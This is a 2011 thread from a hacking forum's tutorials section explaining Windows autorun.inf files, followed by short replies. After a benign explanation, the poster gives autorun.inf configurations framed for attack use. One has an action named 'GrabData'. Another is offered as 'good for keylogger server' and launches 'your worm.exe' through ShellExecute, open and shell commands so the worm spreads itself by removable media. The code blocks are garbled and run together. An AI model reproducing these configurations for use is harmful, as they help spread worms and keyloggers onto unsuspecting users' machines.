![]() |
|
[TUT]How to make Autorun.inf - Printable Version +- Sinisterly (https://sinister.li) +-- Forum: Hacking (https://sinister.li/Forum-Hacking) +--- Forum: Tutorials (https://sinister.li/Forum-Tutorials) +--- Thread: [TUT]How to make Autorun.inf (/Thread-TUT-How-to-make-Autorun-inf) |
[TUT]How to make Autorun.inf - JuiceKing - 05-12-2011 Autorun.inf is the primary instruction file associated with the Autorun function. Autorun.inf itself is a simple text-based configuration file that tells the operating system which executable to start, which icon to use, and which additional menu commands to make available. In other words, autorun.inf tells Windows how to deal open the presentation and treat the contents of the CD. The entire sequence is initiated when the "disk change notifcation" polling discovers a new disk in the CD or DVD ROM drive. Then, if the "Auto insert notification" feature is enabled (it is by default), Windows checks in the new disk's root directory for the existence of an "autorun.inf" file. If found, Windows then reads and follows the specific instructions this file defines. If no autorun.inf file is found, then Windows refers to the new disk by its serial number and executes the default actions associated with the (data or audio) content on the disk The Autorun.inf file defines the following: Autorun.inf Defines the following: The process or application that will automatically run when a disk is inserted Automatically run when CD is inserted Optionally, one can define the process or application that will run for specific Operating environments. Icon Representing CD or DVD The icon that will represent your application's CD or DVD when the drive is viewed with My Computer or Explorer. Menu Commands when CD-ROM is clicked Menu commands displayed when the user right-clicks the CD-ROM icon from My Computer or Explorer Code: [autorun]
open=autorun.exe
icon=autorun.icoor: Code: [autorun]
open=server.bat
action=GrabDataCode: [autorun]
shellexecute=launch.bat
ACTION = SystemThis is good for keylogger server: Code: [ AutoRun ]
ShellExecute = your worm . exe
shellopencommand = your worm . exe
shellexplorecommand = your worm . exe
open = your wormThis .inf copy server itself. Enjoy! :thumbs: RE: Autorun.inf - 1234hotmaster - 05-12-2011 hi well i don't know how on earth does that have to do with batch but i think i already made the same here: http://www.hackcommunity.com/Thread-TUT-USB-and-CD-autorun i even made a tool for it here: http://www.hackcommunity.com/Thread-1234hotmaster-Autorun-Builder?highlight=autorun well thanks anyway
RE: Autorun.inf - JuiceKing - 05-13-2011 (05-12-2011, 07:28 PM)1234hotmaster Wrote: hi well i don't know how on earth does that have to do with batch but i think i already made the same here: I'm sorry I did not know I thank you! Your tutorial is better! ![]() this is not the Batch but I thought I put here because it can be called a section "Batch and shell scripting" "shell scripting" I thought it should be here to post... Sorry! ^_^' :'( |